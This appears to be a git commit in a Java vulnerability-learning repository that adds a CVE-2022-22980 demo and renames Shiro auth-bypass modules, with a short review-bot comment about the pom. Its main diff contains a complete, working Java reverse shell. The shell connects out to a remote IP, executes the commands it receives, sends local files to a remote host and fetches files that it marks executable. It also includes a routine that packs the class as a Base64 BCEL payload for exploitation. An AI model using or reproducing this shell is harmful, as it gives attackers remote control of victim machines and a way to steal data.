
Commit e3b6694

author
threedr3am
committed
add CVE-2022-22980 Learning Demo
1 parent 2f802e6 commit e3b6694


43 files changed

+434
-152
lines changed


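--- a/common/src/main/java/ReverseShell.java
+++ b/common/src/main/java/ReverseShell.java
@@ -15,113 +15,117 @@
 
 public class ReverseShell implements Runnable {
 
-private String ip;
-private Integer port;
+private String ip;
+private Integer port;
 
-private InputStream inputStream;
-private OutputStream outputStream;
+private InputStream inputStream;
+private OutputStream outputStream;
 
-public ReverseShell(String ip, Integer port) {
-this.ip = ip;
-this.port = port;
-new Thread(this).start();
-}
-
-public ReverseShell(InputStream inputStream, OutputStream outputStream) {
-this.inputStream = inputStream;
-this.outputStream = outputStream;
-new Thread(this).start();
-}
+public ReverseShell(String ip, Integer port) {
+this.ip = ip;
+this.port = port;
+new Thread(this).start();
+}
 
-@Override
-public void run() {
-if (outputStream != null && inputStream != null) {
-try {
-BufferedWriter bufferedWriter = new BufferedWriter(new OutputStreamWriter(outputStream));
-BufferedReader read = new BufferedReader(new InputStreamReader(inputStream));
-String line2;
-while ((line2 = read.readLine()) != null) {
-bufferedWriter.write(line2);
-bufferedWriter.newLine();
-bufferedWriter.flush();
-}
-} catch (Exception e) {}
-} else {
-try {
-Socket socket = new Socket(ip, port);
-BufferedWriter bufferedWriter = new BufferedWriter(
-new OutputStreamWriter(socket.getOutputStream()));
-bufferedWriter.write("success!");
-bufferedWriter.newLine();
-bufferedWriter.flush();
+public ReverseShell(InputStream inputStream, OutputStream outputStream) {
+this.inputStream = inputStream;
+this.outputStream = outputStream;
+new Thread(this).start();
+}
 
-BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(socket.getInputStream()));
-while (true) {
-String line = bufferedReader.readLine();
-if (line.equals("exit"))
-return;
-Process pro = null;
-try {
-if (line.startsWith("${IFS}")) {
-line = line.substring(6);
-String[] cmd = line.split("\\$\\{IFS\\}");
-pro = Runtime.getRuntime().exec(cmd);
-} else if (line.startsWith("download")) {
-line = line.substring(8).trim();
-String[] cmd = line.split(" ");
-String file = cmd[0];
-String ip = cmd[1];
-String port = cmd[2];
-byte[] bytes = Files.readAllBytes(Paths.get(file));
-Socket transferFileSocket = new Socket(ip, Integer.parseInt(port));
-transferFileSocket.getOutputStream().write(bytes);
-transferFileSocket.getOutputStream().flush();
-transferFileSocket.getOutputStream().close();
-transferFileSocket.close();
-} else if (line.startsWith("upload")) {
-line = line.substring(6).trim();
-String[] cmd = line.split(" ");
-String file = cmd[0];
-String ip = cmd[1];
-String port = cmd[2];
-Socket transferFileSocket = new Socket(ip, Integer.parseInt(port));
-InputStream inputStream = transferFileSocket.getInputStream();
-Path path = Paths.get(file);
-Files.copy(inputStream, path);
-if (Files.exists(path)) {
-File toSetFile = path.toFile();
-toSetFile.setExecutable(true);
-toSetFile.setReadable(true);
-toSetFile.setWritable(true);
-}
-inputStream.close();
-transferFileSocket.close();
-} else {
-pro = Runtime.getRuntime().exec(line);
-}
-} catch (Exception e) {
-bufferedWriter.write(e.getMessage());
-bufferedWriter.newLine();
-bufferedWriter.flush();
-}
-if (pro == null) {
-continue;
-}
+@Override
+public void run() {
+if (outputStream != null && inputStream != null) {
+try {
+BufferedWriter bufferedWriter = new BufferedWriter(new OutputStreamWriter(outputStream));
+BufferedReader read = new BufferedReader(new InputStreamReader(inputStream));
+String line2;
+while ((line2 = read.readLine()) != null) {
+bufferedWriter.write(line2);
+bufferedWriter.newLine();
+bufferedWriter.flush();
+}
+} catch (Exception e) {
+}
+} else {
+try {
+Socket socket = new Socket(ip, port);
+BufferedWriter bufferedWriter = new BufferedWriter(
+new OutputStreamWriter(socket.getOutputStream()));
+bufferedWriter.write("success!");
+bufferedWriter.newLine();
+bufferedWriter.flush();
 
-new ReverseShell(pro.getInputStream(), socket.getOutputStream());
-new ReverseShell(pro.getErrorStream(), socket.getOutputStream());
-}
+BufferedReader bufferedReader = new BufferedReader(
+new InputStreamReader(socket.getInputStream()));
+while (true) {
+String line = bufferedReader.readLine();
+if (line.equals("exit")) {
+return;
+}
+Process pro = null;
+try {
+if (line.startsWith("${IFS}")) {
+line = line.substring(6);
+String[] cmd = line.split("\\$\\{IFS\\}");
+pro = Runtime.getRuntime().exec(cmd);
+} else if (line.startsWith("download")) {
+line = line.substring(8).trim();
+String[] cmd = line.split(" ");
+String file = cmd[0];
+String ip = cmd[1];
+String port = cmd[2];
+byte[] bytes = Files.readAllBytes(Paths.get(file));
+Socket transferFileSocket = new Socket(ip, Integer.parseInt(port));
+transferFileSocket.getOutputStream().write(bytes);
+transferFileSocket.getOutputStream().flush();
+transferFileSocket.getOutputStream().close();
+transferFileSocket.close();
+} else if (line.startsWith("upload")) {
+line = line.substring(6).trim();
+String[] cmd = line.split(" ");
+String file = cmd[0];
+String ip = cmd[1];
+String port = cmd[2];
+Socket transferFileSocket = new Socket(ip, Integer.parseInt(port));
+InputStream inputStream = transferFileSocket.getInputStream();
+Path path = Paths.get(file);
+Files.copy(inputStream, path);
+if (Files.exists(path)) {
+File toSetFile = path.toFile();
+toSetFile.setExecutable(true);
+toSetFile.setReadable(true);
+toSetFile.setWritable(true);
+}
+inputStream.close();
+transferFileSocket.close();
+} else {
+pro = Runtime.getRuntime().exec(line);
+}
+} catch (Exception e) {
+bufferedWriter.write(e.getMessage());
+bufferedWriter.newLine();
+bufferedWriter.flush();
+}
+if (pro == null) {
+continue;
+}
 
-} catch (IOException e) {}
+new ReverseShell(pro.getInputStream(), socket.getOutputStream());
+new ReverseShell(pro.getErrorStream(), socket.getOutputStream());
 }
+
+} catch (IOException e) {
+}
 }
+}
 
-public static void main(String[] args) throws Exception {
-InputStream inputStream = ReverseShell.class.getResourceAsStream("ReverseShell.class");
-byte[] bytes = new byte[inputStream.available()];
-inputStream.read(bytes);
-String code = Utility.encode(bytes, true);
-System.out.println(Base64.getEncoder().encodeToString(("$$BCEL$$" + code).getBytes()));
+public static void main(String[] args) throws Exception {
+InputStream inputStream = ReverseShell.class.getResourceAsStream("ReverseShell.class");
+byte[] bytes = new byte[inputStream.available()];
+inputStream.read(bytes);
+String code = Utility.encode(bytes, true);
+System.out.println(Base64.getEncoder().encodeToString(("$$BCEL$$" + code).getBytes()));
 // new ReverseShell("127.0.0.1", 12345);
-}
+}
 }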

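--- a/pom.xml
+++ b/pom.xml
@@ -1,6 +1,7 @@
 <?xml version="1.0" encoding="UTF-8"?>
 
-<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+<project xmlns="http://maven.apache.org/POM/4.0.0"
+xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
 <modelVersion>4.0.0</modelVersion>
 
@@ -27,7 +28,6 @@
 <module>nexus</module>
 <module>apache-poi</module>
 <module>java-compile</module>
-<module>auth-bypass(shiro=1.7.1)</module>
 </modules>
 
 <name>learn-java-bug</name>
@@ -56,56 +56,45 @@
 </dependency>
 
 
-<!-- <dependency>-->
-<!-- <groupId>com.google.guava</groupId>-->
-<!-- <artifactId>guava</artifactId>-->
-<!-- <version>26.0-jre</version>-->
-<!-- </dependency>-->
+<!-- <dependency>-->
+<!-- <groupId>com.google.guava</groupId>-->
+<!-- <artifactId>guava</artifactId>-->
+<!-- <version>26.0-jre</version>-->
+<!-- </dependency>-->
 
 
 <!-- Javaee API -->
-<!-- <dependency>-->
-<!-- <groupId>javax</groupId>-->
-<!-- <artifactId>javaee-api</artifactId>-->
-<!-- <version>6.0</version>-->
-<!-- </dependency>-->
-
-
-
-
-
-
+<!-- <dependency>-->
+<!-- <groupId>javax</groupId>-->
+<!-- <artifactId>javaee-api</artifactId>-->
+<!-- <version>6.0</version>-->
+<!-- </dependency>-->
 
 
 <!-- hibernate -->
-<!-- <dependency>-->
-<!-- <groupId>org.hibernate</groupId>-->
-<!-- <artifactId>hibernate</artifactId>-->
-<!-- <version>3.2.1.ga</version>-->
-<!-- <exclusions>-->
-<!-- <exclusion>-->
-<!-- <groupId>javax.transaction</groupId>-->
-<!-- <artifactId>jta</artifactId>-->
-<!-- </exclusion>-->
-<!-- <exclusion>-->
-<!-- <groupId>asm</groupId>-->
-<!-- <artifactId>asm</artifactId>-->
-<!-- </exclusion>-->
-<!-- <exclusion>-->
-<!-- <groupId>asm</groupId>-->
-<!-- <artifactId>asm-attrs</artifactId>-->
-<!-- </exclusion>-->
-<!-- <exclusion>-->
-<!-- <groupId>cglib</groupId>-->
-<!-- <artifactId>cglib</artifactId>-->
-<!-- </exclusion>-->
-<!-- </exclusions>-->
-<!-- </dependency>-->
-
-
-
-
-
+<!-- <dependency>-->
+<!-- <groupId>org.hibernate</groupId>-->
+<!-- <artifactId>hibernate</artifactId>-->
+<!-- <version>3.2.1.ga</version>-->
+<!-- <exclusions>-->
+<!-- <exclusion>-->
+<!-- <groupId>javax.transaction</groupId>-->
+<!-- <artifactId>jta</artifactId>-->
+<!-- </exclusion>-->
+<!-- <exclusion>-->
+<!-- <groupId>asm</groupId>-->
+<!-- <artifactId>asm</artifactId>-->
+<!-- </exclusion>-->
+<!-- <exclusion>-->
+<!-- <groupId>asm</groupId>-->
+<!-- <artifactId>asm-attrs</artifactId>-->
+<!-- </exclusion>-->
+<!-- <exclusion>-->
+<!-- <groupId>cglib</groupId>-->
+<!-- <artifactId>cglib</artifactId>-->
+<!-- </exclusion>-->
+<!-- </exclusions>-->
+<!-- </dependency>-->
 
 
 </dependencies>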
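Review bot: The second hunk removes `<module>auth-bypass(shiro=1.7.1)</module>` from the root `<modules>` list, and nothing in the sections visible on this page registers that module anywhere else, so it may silently drop out of the reactor build. The two other shiro modules shown here are renamed rather than deleted, so this one was presumably moved or renamed too; most of the 43 changed files are hidden, so confirm that it is still listed by some parent pom, or restore an entry such as `<module>RENAMED_MODULE_DIR</module>` (placeholder for its new directory name). The remaining hunks in this file only re-indent commented-out dependencies; keeping that cleanup in its own commit would make the CVE-2022-22980 demo change easier to audit.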

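--- a/shiro/auth-bypass(shiro<=1.4.1)/pom.xml
+++ b/shiro/auth-bypass-shiro-1-4-1/pom.xml
@@ -10,7 +10,7 @@
 </parent>
 
 <modelVersion>4.0.0</modelVersion>
-<artifactId>auth-bypass-shiro-1.4.1</artifactId>
+<artifactId>auth-bypass-shiro-1-4-1</artifactId>
 <build>
 <plugins>
 <plugin>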

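--- a/shiro/auth-bypass(shiro<1.5.2)/pom.xml
+++ b/shiro/auth-bypass-shiro-1-5-1/pom.xml
@@ -10,7 +10,7 @@
 </parent>
 
 <modelVersion>4.0.0</modelVersion>
-<artifactId>auth-bypass-cve-2020-1957</artifactId>
+<artifactId>auth-bypass-shiro-1-5-1</artifactId>
 <build>
 <plugins>
 <plugin>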
